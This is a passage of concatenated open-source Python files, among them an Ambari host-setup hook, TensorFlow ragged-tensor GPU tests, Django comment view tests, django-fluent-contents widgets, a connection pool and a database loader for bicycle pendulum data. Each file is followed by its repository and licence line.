        )
        if not params.host_sys_prepped and params.override_uid == "true":
            set_uid(params.hbase_user, params.hbase_user_dirs)
        else:
            Logger.info('Skipping setting uid for hbase user as host is sys prepped')
        pass
    if not params.host_sys_prepped:
        if params.has_namenode:
            create_dfs_cluster_admins()
    else:
        Logger.info('Skipping setting dfs cluster admin as host is sys prepped')
def create_dfs_cluster_admins():
    """
    dfs.cluster.administrators support format <comma-delimited list of usernames><space><comma-delimited list of group names>

    Ensures the configured admin users/groups exist and adds the hdfs user
    to the admin groups.
    """
    import params
    groups_list = create_users_and_groups(params.dfs_cluster_administrators_group)
    User(params.hdfs_user,
         groups = params.user_to_groups_dict[params.hdfs_user] + groups_list,
         ignore_failures = params.ignore_groupsusers_create
    )
def create_users_and_groups(user_and_groups):
    """Create users and groups from a dfs.cluster.administrators value.

    Format: '<comma-delimited users><space><comma-delimited groups>'; the
    group part is optional. Returns the list of group names (may be empty).
    """
    import params
    # Split into the user part and the (optional) group part.
    parts = re.split('\s', user_and_groups)
    if len(parts) == 1:
        parts.append("")
    users_list = parts[0].split(",") if parts[0] else []
    groups_list = parts[1].split(",") if parts[1] else []
    if users_list:
        User(users_list,
             ignore_failures = params.ignore_groupsusers_create
        )
    if groups_list:
        # Pass a copy so the resource cannot mutate the list we return.
        Group(copy(groups_list),
              ignore_failures = params.ignore_groupsusers_create
        )
    return groups_list
def set_uid(user, user_dirs):
    """Run changeToSecureUid.sh to give *user* a secure (>1000) uid.

    user_dirs - comma separated directories whose ownership is fixed up by
    the script.
    """
    import params
    File(format("{tmp_dir}/changeUid.sh"),
         content=StaticFile("changeToSecureUid.sh"),
         mode=0555)
    ignore_groupsusers_create_str = str(params.ignore_groupsusers_create).lower()
    uid = get_uid(user)
    # Skip when the user already has a uid above 1000 or creation is ignored.
    Execute(format("{tmp_dir}/changeUid.sh {user} {user_dirs} {uid}"),
            not_if = format("(test $(id -u {user}) -gt 1000) || ({ignore_groupsusers_create_str})"))
def get_uid(user):
    """Resolve the uid to use for *user*.

    Order of precedence: a '<user>_uid' property found in any configuration
    type; 0 for the smoke user; otherwise a uid generated by
    changeToSecureUid.sh. Uses the Python 2-only 'commands' module.
    """
    import params
    import commands
    user_str = str(user) + "_uid"
    # All configuration types that define a '<user>_uid' property.
    service_env = [ serviceEnv for serviceEnv in params.config['configurations'] if user_str in params.config['configurations'][serviceEnv]]
    if service_env and params.config['configurations'][service_env[0]][user_str]:
        service_env_str = str(service_env[0])
        uid = params.config['configurations'][service_env_str][user_str]
        if len(service_env) > 1:
            Logger.warning("Multiple values found for %s, using %s" % (user_str, uid))
        return uid
    else:
        if user == params.smoke_user:
            return 0
        File(format("{tmp_dir}/changeUid.sh"),
             content=StaticFile("changeToSecureUid.sh"),
             mode=0555)
        ignore_groupsusers_create_str = str(params.ignore_groupsusers_create).lower()
        # Without arguments the script only prints a free secure uid.
        newUid=commands.getoutput(format("{tmp_dir}/changeUid.sh {user}"))
        return int(newUid)
def setup_hadoop_env():
    """Write hadoop-env.sh and create the Hadoop base/tmp directories.

    Only runs on hosts that carry a NameNode. Python 2 code (octal 0755).
    """
    import params
    if params.has_namenode:
        # In secure clusters the task-controller config must be root-owned.
        if params.security_enabled:
            tc_owner = "root"
        else:
            tc_owner = params.hdfs_user
        Directory(params.hadoop_dir, mode=0755)
        # IOP < 4.0 used a conf -> conf.empty symlink for /etc/hadoop/
        if Script.is_stack_less_than("4.0"):
            Directory(params.hadoop_conf_empty_dir,
                      create_parents = True,
                      owner = 'root',
                      group = params.user_group
            )
            Link(params.hadoop_conf_dir,
                 to=params.hadoop_conf_empty_dir,
                 not_if=format("ls {hadoop_conf_dir}")
            )
        # write out hadoop-env.sh, but only if the directory exists
        if os.path.exists(params.hadoop_conf_dir):
            File(os.path.join(params.hadoop_conf_dir, 'hadoop-env.sh'),
                 owner=tc_owner, group=params.user_group,
                 content=InlineTemplate(params.hadoop_env_sh_template)
            )
        # Create tmp dir for java.io.tmpdir
        # Handle a situation when /tmp is set to noexec
        Directory(params.hadoop_java_io_tmpdir,
                  owner=params.hdfs_user,
                  group=params.user_group,
                  mode=0777
        )
def setup_java():
    """
    Installs jdk using specific params, that comes from ambari-server.

    Downloads the JDK archive from the Ambari server and unpacks it into
    the parent of java_home; no-op when java already exists there.
    """
    import params
    java_exec = format("{java_home}/bin/java")
    if not os.path.isfile(java_exec):
        jdk_curl_target = format("{tmp_dir}/{jdk_name}")
        java_dir = os.path.dirname(params.java_home)
        tmp_java_dir = format("{tmp_dir}/jdk")
        if not params.jdk_name:
            # No server-provided JDK configured; nothing to install.
            return
        Directory(params.artifact_dir,
                  create_parents = True,
                  )
        # Download once; skipped when the archive is already cached.
        File(jdk_curl_target,
             content = DownloadSource(format("{jdk_location}/{jdk_name}")),
             not_if = format("test -f {jdk_curl_target}")
             )
        # NOTE(review): for a jdk_name that ends in neither '.bin' nor '.gz'
        # chmod_cmd/install_cmd are left undefined and the Execute below
        # would raise NameError -- confirm upstream guarantees the extension.
        if params.jdk_name.endswith(".bin"):
            chmod_cmd = ("chmod", "+x", jdk_curl_target)
            install_cmd = format("mkdir -p {tmp_java_dir} && cd {tmp_java_dir} && echo A | {jdk_curl_target} -noregister && {sudo} cp -rp {tmp_java_dir}/* {java_dir}")
        elif params.jdk_name.endswith(".gz"):
            chmod_cmd = ("chmod","a+x", java_dir)
            install_cmd = format("mkdir -p {tmp_java_dir} && cd {tmp_java_dir} && tar -xf {jdk_curl_target} && {sudo} cp -rp {tmp_java_dir}/* {java_dir}")
        Directory(java_dir
                  )
        Execute(chmod_cmd,
                sudo = True,
                )
        Execute(install_cmd,
                )
        File(format("{java_home}/bin/java"),
             mode=0755,
             cd_access="a",
             )
        # Hand ownership of the unpacked JDK to the agent user/group.
        Execute(("chgrp","-R", params.user_group, params.java_home),
                sudo = True,
                )
        Execute(("chown","-R", getpass.getuser(), params.java_home),
                sudo = True,
                )
| arenadata/ambari | ambari-server/src/main/resources/stacks/BigInsights/4.0/hooks/before-ANY/scripts/shared_initialization.py | Python | apache-2.0 | 7,546 |
from bin.main import Main
import os
if __name__ == "__main__":
    # Run from the script's own directory so relative resource paths resolve.
    os.chdir(os.path.dirname(os.path.abspath(__file__)))
    Main().run()
| rCorvidae/OrionPI | src/OrionPI.py | Python | mit | 200 |
import _plotly_utils.basevalidators
class AlignsrcValidator(_plotly_utils.basevalidators.SrcValidator):
    """Validator for the 'alignsrc' property of 'pointcloud.hoverlabel'.

    Auto-generated; all validation is delegated to SrcValidator.
    """

    def __init__(
        self, plotly_name="alignsrc", parent_name="pointcloud.hoverlabel", **kwargs
    ):
        super(AlignsrcValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            # Defaults below may be overridden by the caller via kwargs.
            edit_type=kwargs.pop("edit_type", "none"),
            role=kwargs.pop("role", "info"),
            **kwargs
        )
| plotly/python-api | packages/python/plotly/plotly/validators/pointcloud/hoverlabel/_alignsrc.py | Python | mit | 469 |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests that ragged tensors work with GPU, such as placement of int and string.
Test using ragged tensors with map_fn and distributed dataset. Since GPU does
not support strings, ragged tensors containing string should always be placed
on CPU.
"""
from absl.testing import parameterized
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import multi_device_iterator_ops
from tensorflow.python.distribute import mirrored_strategy
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import map_fn
from tensorflow.python.ops.ragged import ragged_factory_ops
from tensorflow.python.platform import test
def ragged_int64():
    """Return a fixed 8-row int64 ragged tensor used as test input."""
    return ragged_factory_ops.constant(
        [
            [3, 1, 4, 1],
            [],
            [5, 9, 2],
            [6],
            [],
            [3, 1, 4, 1],
            [3, 1],
            [2, 1, 4, 1],
        ],
        dtype=dtypes.int64,
    )
def ragged_str():
    """Return a fixed 8-row string ragged tensor used as test input."""
    return ragged_factory_ops.constant([
        ['3', '1', '4', '1'],
        [],
        ['5', '9', '2'],
        ['6'],
        [],
        ['3', '1', '4', '1'],
        ['3', '1'],
        ['2', '1', '4', '1'],
    ])
def dense_str():
    """Return a fixed 8x4 dense string tensor used as test input."""
    return constant_op.constant([
        ['3', '1', '4', '1'],
        ['1', '2', '4', '1'],
        ['2', '3', '4', '1'],
        ['7', '4', '4', '1'],
        ['9', '5', '4', '1'],
        ['6', '6', '4', '1'],
        ['4', '7', '4', '1'],
        ['5', '8', '4', '1'],
    ])
class RaggedFactoryOpsTest(test_util.TensorFlowTestCase,
                           parameterized.TestCase):
  """Tests ragged tensors (int64 and string) with map_fn,
  MultiDeviceIterator and distributed datasets on GPU devices."""

  @parameterized.parameters(
      (ragged_int64,),
      (ragged_str,),
  )
  def testRaggedWithMapFn(self, ragged_factory):
    """Identity map_fn over a ragged tensor round-trips the values."""

    @def_function.function
    def map_fn_producer(inputs):
      return map_fn.map_fn_v2(lambda x: x, inputs)

    t = ragged_factory()
    result = self.evaluate(map_fn_producer(t))
    self.assertAllEqual(t.values, result.values)

  @parameterized.parameters(
      (ragged_int64,),
      (ragged_str,),
  )
  def testRaggedWithMultiDeviceIterator(self, ragged_factory):
    """A MultiDeviceIterator on GPU yields the first ragged batch."""

    @def_function.function
    def dataset_producer(t):
      ragged_ds = dataset_ops.Dataset.from_tensor_slices(t).batch(2)
      it = multi_device_iterator_ops.MultiDeviceIterator(ragged_ds, ['GPU:0'])
      with ops.device_v2('GPU:0'):
        return it.get_next_as_optional()

    t = ragged_factory()
    if t.dtype == dtypes.string:
      self.skipTest('b/194439197: fix ragged tensor of string')
    result = dataset_producer(t)
    self.assertAllEqual(
        self.evaluate(t[0]), self.evaluate(result[0].get_value()[0]))

  @parameterized.parameters(
      (ragged_int64,),
      (ragged_str,),
  )
  def testRaggedWithDistributedDataset(self, ragged_factory):
    """A MirroredStrategy-distributed dataset yields the first ragged row."""

    @def_function.function
    def distributed_dataset_producer(t):
      strategy = mirrored_strategy.MirroredStrategy(['GPU:0', 'GPU:1'])
      ragged_ds = dataset_ops.Dataset.from_tensor_slices(t).batch(2)
      dist_dataset = strategy.experimental_distribute_dataset(ragged_ds)
      ds = iter(dist_dataset)
      return strategy.experimental_local_results(next(ds))[0]

    t = ragged_factory()
    if t.dtype == dtypes.string:
      self.skipTest('b/194439197: fix ragged tensor of string')
    result = distributed_dataset_producer(t)
    self.assertAllEqual(self.evaluate(t[0]), self.evaluate(result[0]))

  @parameterized.parameters(
      (dense_str,),
      # (ragged_str,),  # TODO(b/194439197) fix ragged tensor of string
  )
  def testIntStringWithDistributedDataset(self, string_factory):
    """A dict of int ragged + string tensors distributes correctly;
    strings stay on CPU since GPU has no string support."""

    @def_function.function
    def distributed_dataset_producer(t):
      strategy = mirrored_strategy.MirroredStrategy(['GPU:0', 'GPU:1'])
      ragged_ds = dataset_ops.Dataset.from_tensor_slices(t).batch(2)
      dist_dataset = strategy.experimental_distribute_dataset(ragged_ds)
      ds = iter(dist_dataset)
      return strategy.experimental_local_results(next(ds))[0]

    ds_dict = {'int': ragged_int64(), 'str': string_factory()}
    result = distributed_dataset_producer(ds_dict)
    self.assertAllEqual(
        self.evaluate(ds_dict['int'][0]), self.evaluate(result['int'][0]))
    self.assertAllEqual(
        self.evaluate(ds_dict['str'][0]), self.evaluate(result['str'][0]))
if __name__ == '__main__':
  # Standard TensorFlow test entry point.
  test.main()
| tensorflow/tensorflow | tensorflow/python/ops/ragged/ragged_factory_ops_test.py | Python | apache-2.0 | 5,128 |
import psycopg2
import scipy.io
import os
# Set to true if you want to query tables before adding data:
# NOTE(review): these flags are not referenced in this part of the script --
# confirm whether they are still needed.
queryConfigs = False
queryTimeSeries = False
# Create a connection to RoboticBicycle database
conn = psycopg2.connect(database="robot_bicycle_parameters", user="hazelnusse")
cur = conn.cursor()
def insert_statement(cur, table, row):
    """Build a parameterized INSERT statement for *table* via cur.mogrify.

    Generalized from the previous fixed five-column form: the number of
    '%s' placeholders now matches len(row), which is backward compatible
    with the five-element rows used below.
    """
    placeholders = ", ".join(["%s"] * len(row))
    return cur.mogrify("insert into " + table + " values(" + placeholders + ");", row)
# Walk the tree and load every matching .mat file into the database.
# NOTE(review): scipy.io.loadmat(file) receives the bare filename, not
# os.path.join(subdir, file), so only files in the current working directory
# can actually be opened -- confirm whether subdirectories hold data.
for subdir, dirs, files in os.walk('.'):
    # Counters double as primary keys; they restart for every directory, so
    # duplicate keys are absorbed by the IntegrityError handlers below.
    i = 0
    j = 0
    files.sort()
    for file in files:
        if file.find('RobotRwheelTorsional') != -1:
            matdata = scipy.io.loadmat(file)
            i += 1
            # (id, sample rate, duration, samples, notes)
            row = (i,
                   int(matdata['sampleRate'][0][0]),
                   int(matdata['duration'][0][0]),
                   matdata['data'].transpose()[0].tolist(),'')
            SQL = insert_statement(
                cur,
                'parametermeasurements.rearwheeltorsionalpendulumtimeseries',
                row)
            try:
                cur.execute(SQL)
                conn.commit()
            except (psycopg2.IntegrityError, psycopg2.InternalError) as inst:
                # Roll back so the connection stays usable for the next row.
                print("Exception in adding wheel torsional pendulum data:")
                print(type(inst))
                print(inst)
                conn.rollback()
                continue
            print(cur.statusmessage)
        if file.find('RobotRwheelCompound') != -1:
            matdata = scipy.io.loadmat(file)
            j += 1
            # (id, sample rate, duration, samples, notes)
            row = (j,
                   int(matdata['sampleRate'][0][0]),
                   int(matdata['duration'][0][0]),
                   matdata['data'].transpose()[0].tolist(), '')
            SQL = insert_statement(
                cur,
                'parametermeasurements.rearwheelcompoundpendulumtimeseries',
                row)
            try:
                cur.execute(SQL)
                conn.commit()
            except (psycopg2.IntegrityError, psycopg2.InternalError) as inst:
                # Roll back so the connection stays usable for the next row.
                print("Exception in adding wheel compound pendulum data:")
                print(type(inst))
                print(inst)
                conn.rollback()
                continue
            print(cur.statusmessage)
cur.close()
conn.close()
| hazelnusse/robot.bicycle | data/physicalparameters/RawData/PeriodMeasurements/RearWheel/populateTable.py | Python | bsd-2-clause | 2,289 |
# Maps bag names to the source files packaged into each bag.
store_contents = {
    'bagone': ['testsrc/test.tid', 'testsrc/file.css']
}
| tiddlyweb/tiddlywebplugins.ibuilder | testpackage/instance.py | Python | bsd-3-clause | 76 |
from django.conf import settings
from django.contrib.admin.widgets import AdminTextareaWidget
from django.forms.utils import flatatt
from django.forms.widgets import Widget
from django.template.loader import render_to_string
from django.utils.encoding import smart_text
from django.utils.html import escape
from django.utils.safestring import mark_safe
from fluent_contents.models.managers import (
get_parent_active_language_choices,
get_parent_language_code,
)
class PlaceholderFieldWidget(Widget):
    """
    The widget to render a :class:`fluent_contents.models.PlaceholderField`.

    It outputs a ``<div>`` element which operates as placeholder content area.
    The client-side editor will use that area to display the admin interfaces of the :class:`fluent_contents.models.ContentItem` models.
    """

    class Media:
        # Static assets required by the client-side placeholder editor.
        js = (
            "admin/js/vendor/jquery/jquery{}.js".format(
                "" if settings.DEBUG else ".min"
            ),
            "admin/js/jquery.init.js",
            "fluent_contents/admin/cp_admin.js",
            "fluent_contents/admin/cp_data.js",
            "fluent_contents/admin/cp_plugins.js",
        )
        css = {"screen": ("fluent_contents/admin/cp_admin.css",)}

    def __init__(self, attrs=None, slot=None, parent_object=None, plugins=None):
        """Store the slot name, owning object and optional plugin whitelist."""
        super(PlaceholderFieldWidget, self).__init__(attrs)
        self.slot = slot
        self._plugins = plugins
        self.parent_object = parent_object

    def value_from_datadict(self, data, files, name):
        # This returns the field value from the form POST fields.
        # Currently returns a dummy value, so the PlaceholderFieldDescriptor() can detect it.
        return "-DUMMY-"

    def render(self, name, value, attrs=None, renderer=None):
        """
        Render the placeholder field.

        When the parent object is multilingual, the context also carries the
        other active languages so the editor can offer a copy dialog.
        """
        other_instance_languages = None
        if value and value != "-DUMMY-":
            if get_parent_language_code(self.parent_object):
                # Parent is a multilingual object, provide information
                # for the copy dialog.
                other_instance_languages = get_parent_active_language_choices(
                    self.parent_object, exclude_current=True
                )

        context = {
            "cp_plugin_list": list(self.plugins),
            "placeholder_id": "",
            "placeholder_slot": self.slot,
            "other_instance_languages": other_instance_languages,
        }
        return mark_safe(
            render_to_string(
                "admin/fluent_contents/placeholderfield/widget.html", context
            )
        )

    @property
    def plugins(self):
        """
        Get the set of plugins that this widget should display.
        """
        # Avoid circular reference because __init__.py imports subfolders too
        from fluent_contents import extensions

        if self._plugins is None:
            return extensions.plugin_pool.get_plugins()
        else:
            return extensions.plugin_pool.get_plugins_by_name(*self._plugins)
class WysiwygWidget(AdminTextareaWidget):
    """
    WYSIWYG widget: a textarea tagged with the 'cp-wysiwyg-widget' class so
    the client-side editor can enhance it.
    """

    def __init__(self, attrs=None):
        # Default to a compact 4-row textarea unless overridden.
        defaults = {"rows": 4}
        if attrs:
            defaults.update(attrs)
        super(WysiwygWidget, self).__init__(attrs)

    def render(self, name, value, attrs=None, renderer=None):
        """Render the textarea with the marker CSS class appended."""
        value = smart_text(value or u"")
        final_attrs = self.build_attrs(attrs)  # signature changed in Django 1.11
        final_attrs["name"] = name
        if "class" in final_attrs:
            final_attrs["class"] += " cp-wysiwyg-widget"
        else:
            final_attrs["class"] = "cp-wysiwyg-widget"
        return mark_safe(
            u"<textarea{0}>{1}</textarea>".format(flatatt(final_attrs), escape(value))
        )
| edoburu/django-fluent-contents | fluent_contents/forms/widgets.py | Python | apache-2.0 | 3,830 |
#coding=utf-8
import time
import threading
class ConnectionPool(object):
    """A minimal thread-safe pool of lazily created connection objects.

    Connections are built on demand (up to ``max_size``) by calling
    ``connection_class(*args, **kwargs)``. ``get()`` checks one out and
    ``release()`` returns it to the idle list.
    """

    def __init__(self, connection_class, args, kwargs=None, max_size=5):
        self.connection_class = connection_class  # factory callable
        self._args = args                         # positional args for the factory
        self._kwargs = kwargs                     # optional keyword args for the factory
        self.max_size = max_size                  # cap on created connections
        self._size = 0                            # number of connections created so far
        self.active_count = 0                     # see NOTE in get()
        self._mutex = threading.Semaphore()       # guards counters and the idle list
        self.conn = []                            # idle (released) connections

    def _make_connection(self):
        """Create one connection and account for it (caller holds the mutex)."""
        if self._kwargs:
            fresh = self.connection_class(*self._args, **self._kwargs)
        else:
            fresh = self.connection_class(*self._args)
        self._size += 1
        self.active_count += 1
        return fresh

    def get(self, retry_times=5):
        """Check out a connection; returns None when none is available.

        NOTE(review): reusing an idle connection does not re-increment
        active_count although release() decrements it -- possible
        accounting quirk, preserved as-is.
        """
        checked_out = None
        for _ in range(retry_times):
            self._mutex.acquire()
            try:
                try:
                    checked_out = self.conn.pop()
                except IndexError:
                    if self._size < self.max_size:
                        checked_out = self._make_connection()
                    else:
                        # No idle connection and the cap is reached: give up.
                        return None
            finally:
                self._mutex.release()
            if checked_out is not None:
                break
            time.sleep(0.0001)
        return checked_out

    def release(self, conn):
        """Return a checked-out connection to the idle list."""
        if isinstance(conn, self.connection_class):
            self._mutex.acquire()
            self.conn.append(conn)
            self.active_count -= 1
            self._mutex.release()

    def disconnect(self):
        """Close every idle connection (checked-out ones are untouched)."""
        for pooled in self.conn:
            pooled.close()

    def decrease(self):
        """Forget one connection: decrement the size/active counters."""
        self._mutex.acquire()
        self._size -= 1
        self.active_count -= 1
        self._mutex.release()

    def close(self):
        """Shut the pool down by closing all idle connections."""
        self.disconnect()
| seraphlnWu/in_trip | in_trip/in_trip/lib/pool.py | Python | mit | 1,892 |
from __future__ import absolute_import
import re
from django.conf import settings
from django.contrib.auth.models import User
from django.contrib.comments import signals
from django.contrib.comments.models import Comment
from . import CommentTestCase
from ..models import Article, Book
post_redirect_re = re.compile(r'^http://testserver/posted/\?c=(?P<pk>\d+$)')
class CommentViewTests(CommentTestCase):
    """Tests for the comment posting view: input validation, preview,
    security-hash checking, signals, and post-redirect handling."""

    def testPostCommentHTTPMethods(self):
        """GET on the post view is rejected with 405 and an Allow header."""
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        response = self.client.get("/post/", data)
        self.assertEqual(response.status_code, 405)
        self.assertEqual(response["Allow"], "POST")

    def testPostCommentMissingCtype(self):
        """Posting without a content_type field is a 400."""
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        del data["content_type"]
        response = self.client.post("/post/", data)
        self.assertEqual(response.status_code, 400)

    def testPostCommentBadCtype(self):
        """Posting with an unresolvable content_type is a 400."""
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        data["content_type"] = "Nobody expects the Spanish Inquisition!"
        response = self.client.post("/post/", data)
        self.assertEqual(response.status_code, 400)

    def testPostCommentMissingObjectPK(self):
        """Posting without an object_pk field is a 400."""
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        del data["object_pk"]
        response = self.client.post("/post/", data)
        self.assertEqual(response.status_code, 400)

    def testPostCommentBadObjectPK(self):
        """Posting with an object_pk that matches no object is a 400."""
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        data["object_pk"] = "14"
        response = self.client.post("/post/", data)
        self.assertEqual(response.status_code, 400)

    def testPostInvalidIntegerPK(self):
        """A non-integer pk for an integer-pk model is a 400, not a crash."""
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        data["comment"] = "This is another comment"
        data["object_pk"] = u'\ufffd'
        response = self.client.post("/post/", data)
        self.assertEqual(response.status_code, 400)

    def testPostInvalidDecimalPK(self):
        """A non-decimal pk for a decimal-pk model is a 400, not a crash."""
        b = Book.objects.get(pk='12.34')
        data = self.getValidData(b)
        data["comment"] = "This is another comment"
        data["object_pk"] = 'cookies'
        response = self.client.post("/post/", data)
        self.assertEqual(response.status_code, 400)

    def testCommentPreview(self):
        """A submit with 'preview' renders the preview template instead of saving."""
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        data["preview"] = "Preview"
        response = self.client.post("/post/", data)
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, "comments/preview.html")

    def testHashTampering(self):
        """A tampered security hash is rejected with 400."""
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        data["security_hash"] = "Nobody expects the Spanish Inquisition!"
        response = self.client.post("/post/", data)
        self.assertEqual(response.status_code, 400)

    def testDebugCommentErrors(self):
        """The debug error template should be shown only if DEBUG is True"""
        olddebug = settings.DEBUG
        settings.DEBUG = True
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        data["security_hash"] = "Nobody expects the Spanish Inquisition!"
        response = self.client.post("/post/", data)
        self.assertEqual(response.status_code, 400)
        self.assertTemplateUsed(response, "comments/400-debug.html")
        settings.DEBUG = False
        response = self.client.post("/post/", data)
        self.assertEqual(response.status_code, 400)
        self.assertTemplateNotUsed(response, "comments/400-debug.html")
        # Restore the original setting so other tests are unaffected.
        settings.DEBUG = olddebug

    def testCreateValidComment(self):
        """A valid post redirects and stores the comment with the client IP."""
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        self.response = self.client.post("/post/", data, REMOTE_ADDR="1.2.3.4")
        self.assertEqual(self.response.status_code, 302)
        self.assertEqual(Comment.objects.count(), 1)
        c = Comment.objects.all()[0]
        self.assertEqual(c.ip_address, "1.2.3.4")
        self.assertEqual(c.comment, "This is my comment")

    def testPostAsAuthenticatedUser(self):
        """An authenticated post fills user, user_name and user_email."""
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        data['name'] = data['email'] = ''
        self.client.login(username="normaluser", password="normaluser")
        self.response = self.client.post("/post/", data, REMOTE_ADDR="1.2.3.4")
        self.assertEqual(self.response.status_code, 302)
        self.assertEqual(Comment.objects.count(), 1)
        c = Comment.objects.all()[0]
        self.assertEqual(c.ip_address, "1.2.3.4")
        u = User.objects.get(username='normaluser')
        self.assertEqual(c.user, u)
        self.assertEqual(c.user_name, u.get_full_name())
        self.assertEqual(c.user_email, u.email)

    def testPostAsAuthenticatedUserWithoutFullname(self):
        """
        Check that the user's name in the comment is populated for
        authenticated users without first_name and last_name.
        """
        user = User.objects.create_user(username='jane_other',
                email='jane@example.com', password='jane_other')
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        data['name'] = data['email'] = ''
        self.client.login(username="jane_other", password="jane_other")
        self.response = self.client.post("/post/", data, REMOTE_ADDR="1.2.3.4")
        c = Comment.objects.get(user=user)
        self.assertEqual(c.ip_address, "1.2.3.4")
        # Falls back to the username when no full name is set.
        self.assertEqual(c.user_name, 'jane_other')
        user.delete()

    def testPreventDuplicateComments(self):
        """Prevent posting the exact same comment twice"""
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        self.client.post("/post/", data)
        self.client.post("/post/", data)
        self.assertEqual(Comment.objects.count(), 1)
        # This should not trigger the duplicate prevention
        self.client.post("/post/", dict(data, comment="My second comment."))
        self.assertEqual(Comment.objects.count(), 2)

    def testCommentSignals(self):
        """Test signals emitted by the comment posting view"""
        # callback
        def receive(sender, **kwargs):
            self.assertEqual(kwargs['comment'].comment, "This is my comment")
            self.assertTrue('request' in kwargs)
            received_signals.append(kwargs.get('signal'))
        # Connect signals and keep track of handled ones
        received_signals = []
        expected_signals = [
            signals.comment_will_be_posted, signals.comment_was_posted
        ]
        for signal in expected_signals:
            signal.connect(receive)
        # Post a comment and check the signals
        self.testCreateValidComment()
        self.assertEqual(received_signals, expected_signals)
        # Disconnect so the callback doesn't leak into other tests.
        for signal in expected_signals:
            signal.disconnect(receive)

    def testWillBePostedSignal(self):
        """
        Test that the comment_will_be_posted signal can prevent the comment from
        actually getting saved
        """
        def receive(sender, **kwargs): return False
        signals.comment_will_be_posted.connect(receive, dispatch_uid="comment-test")
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        response = self.client.post("/post/", data)
        self.assertEqual(response.status_code, 400)
        self.assertEqual(Comment.objects.count(), 0)
        signals.comment_will_be_posted.disconnect(dispatch_uid="comment-test")

    def testWillBePostedSignalModifyComment(self):
        """
        Test that the comment_will_be_posted signal can modify a comment before
        it gets posted
        """
        def receive(sender, **kwargs):
            # a bad but effective spam filter :)...
            kwargs['comment'].is_public = False
        signals.comment_will_be_posted.connect(receive)
        self.testCreateValidComment()
        c = Comment.objects.all()[0]
        self.assertFalse(c.is_public)

    def testCommentNext(self):
        """Test the different "next" actions the comment view can take"""
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        response = self.client.post("/post/", data)
        location = response["Location"]
        match = post_redirect_re.match(location)
        self.assertTrue(match != None, "Unexpected redirect location: %s" % location)
        data["next"] = "/somewhere/else/"
        data["comment"] = "This is another comment"
        response = self.client.post("/post/", data)
        location = response["Location"]
        match = re.search(r"^http://testserver/somewhere/else/\?c=\d+$", location)
        self.assertTrue(match != None, "Unexpected redirect location: %s" % location)

    def testCommentDoneView(self):
        """Following the post redirect renders the 'posted' page for that comment."""
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        response = self.client.post("/post/", data)
        location = response["Location"]
        match = post_redirect_re.match(location)
        self.assertTrue(match != None, "Unexpected redirect location: %s" % location)
        pk = int(match.group('pk'))
        response = self.client.get(location)
        self.assertTemplateUsed(response, "comments/posted.html")
        self.assertEqual(response.context[0]["comment"], Comment.objects.get(pk=pk))

    def testCommentNextWithQueryString(self):
        """
        The `next` key needs to handle already having a query string (#10585)
        """
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        data["next"] = "/somewhere/else/?foo=bar"
        data["comment"] = "This is another comment"
        response = self.client.post("/post/", data)
        location = response["Location"]
        match = re.search(r"^http://testserver/somewhere/else/\?foo=bar&c=\d+$", location)
        self.assertTrue(match != None, "Unexpected redirect location: %s" % location)

    def testCommentPostRedirectWithInvalidIntegerPK(self):
        """
        Tests that attempting to retrieve the location specified in the
        post redirect, after adding some invalid data to the expected
        querystring it ends with, doesn't cause a server error.
        """
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        data["comment"] = "This is another comment"
        response = self.client.post("/post/", data)
        location = response["Location"]
        broken_location = location + u"\ufffd"
        response = self.client.get(broken_location)
        self.assertEqual(response.status_code, 200)

    def testCommentNextWithQueryStringAndAnchor(self):
        """
        The `next` key needs to handle already having an anchor. Refs #13411.
        """
        # With a query string also.
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        data["next"] = "/somewhere/else/?foo=bar#baz"
        data["comment"] = "This is another comment"
        response = self.client.post("/post/", data)
        location = response["Location"]
        match = re.search(r"^http://testserver/somewhere/else/\?foo=bar&c=\d+#baz$", location)
        self.assertTrue(match != None, "Unexpected redirect location: %s" % location)
        # Without a query string
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        data["next"] = "/somewhere/else/#baz"
        data["comment"] = "This is another comment"
        response = self.client.post("/post/", data)
        location = response["Location"]
        match = re.search(r"^http://testserver/somewhere/else/\?c=\d+#baz$", location)
        self.assertTrue(match != None, "Unexpected redirect location: %s" % location)
| lisael/pg-django | tests/regressiontests/comment_tests/tests/comment_view_tests.py | Python | bsd-3-clause | 11,790 |
# -*- coding: utf-8 -*-
# Copyright 2016 Bruno Cauet
# Split an album-file in tracks thanks a cue file
from __future__ import division, absolute_import, print_function
import subprocess
from os import path
from glob import glob
from beets.util import command_output, displayable_path
from beets.plugins import BeetsPlugin
from beets.autotag import TrackInfo
class CuePlugin(BeetsPlugin):
    """Split a single-file album into tracks based on an accompanying .cue
    file, using the external `shnsplit` tool."""

    def __init__(self):
        super(CuePlugin, self).__init__()
        # this does not seem supported by shnsplit
